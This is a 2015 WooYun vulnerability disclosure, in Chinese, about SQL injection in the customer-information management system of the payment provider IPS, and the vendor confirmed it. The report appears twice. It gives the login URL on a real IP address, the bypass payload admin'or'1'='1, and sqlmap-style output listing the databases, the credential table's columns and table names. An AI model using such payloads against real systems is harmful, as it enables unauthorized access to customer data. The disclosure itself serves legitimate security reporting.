当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152716

漏洞标题:环迅支付客户信息管理系统SQL注入

相关厂商:ips.com

漏洞作者: Aasron

提交时间:2015-11-10 12:19

修复时间:2015-12-26 10:16

公开时间:2015-12-26 10:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

问题这么严重,你的公司这么大,来点奖励!

详细说明:

第一次提交忘记给地址了,郁闷~

http://180.168.26.117:8000/8crm/login.php?msg=1


admin'or'1'='1
admin'or'1'='1
这么搞,客户都流失了

1.png


web server operating system: Windows
web application technology: PHP 5.2.13, Apache 2.2.4
back-end DBMS: MySQL 5.0.12
[03:20:54] [INFO] fetching database names
[03:20:54] [INFO] fetching number of databases
[03:20:54] [INFO] resumed: 3
[03:20:54] [INFO] resumed: information_schema
[03:20:54] [INFO] resumed: crm_db
[03:20:54] [INFO] resumed: mysql
available databases [3]:
[*] crm_db
[*] information_schema
[*] mysql


1.png


Database: crm_db
Table: kis_login
[3 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| login_pwd  | varchar(200) |
| login_uid  | varchar(32)  |
| login_uuid | varchar(50)  |
+------------+--------------+


1.png


[03:30:38] [INFO] fetching current database
[03:30:38] [INFO] resumed: crm_db
[03:30:38] [INFO] fetching tables for database: 'crm_db'
[03:30:38] [INFO] fetching number of tables for database 'crm_db'
[03:30:38] [INFO] resumed: 193
[03:30:38] [INFO] resumed: kis_data
[03:30:38] [INFO] resumed: kis_login
[03:30:38] [INFO] resumed: kis_syn
[03:30:38] [INFO] resumed: sms2
[03:30:38] [INFO] resumed: tab_account_client
[03:30:38] [INFO] resumed: tab_account_store
[03:30:38] [INFO] resumed: tab_action
[03:30:38] [INFO] resumed: tab_action_emp
[03:30:38] [INFO] resumed: tab_action_histroy
[03:30:38] [INFO] resumed: tab_actionhistroy_emp
[03:30:38] [INFO] resumed: tab_activity_attend
[03:30:38] [INFO] resumed: tab_activity_doc
[03:30:38] [INFO] resumed: tab_activity_enroll
[03:30:38] [INFO] resumed: tab_activity_linit


太长了,一共193张表,给力啊~~
不深入测试了,这客户信息流出去了危害大啊!

漏洞证明:

第一次提交忘记给地址了,郁闷~

http://180.168.26.117:8000/8crm/login.php?msg=1


这么搞,客户都流失了

1.png


web server operating system: Windows
web application technology: PHP 5.2.13, Apache 2.2.4
back-end DBMS: MySQL 5.0.12
[03:20:54] [INFO] fetching database names
[03:20:54] [INFO] fetching number of databases
[03:20:54] [INFO] resumed: 3
[03:20:54] [INFO] resumed: information_schema
[03:20:54] [INFO] resumed: crm_db
[03:20:54] [INFO] resumed: mysql
available databases [3]:
[*] crm_db
[*] information_schema
[*] mysql


1.png


Database: crm_db
Table: kis_login
[3 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| login_pwd  | varchar(200) |
| login_uid  | varchar(32)  |
| login_uuid | varchar(50)  |
+------------+--------------+


1.png


[03:30:38] [INFO] fetching current database
[03:30:38] [INFO] resumed: crm_db
[03:30:38] [INFO] fetching tables for database: 'crm_db'
[03:30:38] [INFO] fetching number of tables for database 'crm_db'
[03:30:38] [INFO] resumed: 193
[03:30:38] [INFO] resumed: kis_data
[03:30:38] [INFO] resumed: kis_login
[03:30:38] [INFO] resumed: kis_syn
[03:30:38] [INFO] resumed: sms2
[03:30:38] [INFO] resumed: tab_account_client
[03:30:38] [INFO] resumed: tab_account_store
[03:30:38] [INFO] resumed: tab_action
[03:30:38] [INFO] resumed: tab_action_emp
[03:30:38] [INFO] resumed: tab_action_histroy
[03:30:38] [INFO] resumed: tab_actionhistroy_emp
[03:30:38] [INFO] resumed: tab_activity_attend
[03:30:38] [INFO] resumed: tab_activity_doc
[03:30:38] [INFO] resumed: tab_activity_enroll
[03:30:38] [INFO] resumed: tab_activity_linit


太长了,一共193张表,给力啊~~
不深入测试了,这客户信息流出去了危害大啊!

修复方案:

有奖励,才有动力!

版权声明:转载请注明来源 Aasron@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-11 10:14

厂商回复:

谢谢发布,马上进行处理

最新状态:

暂无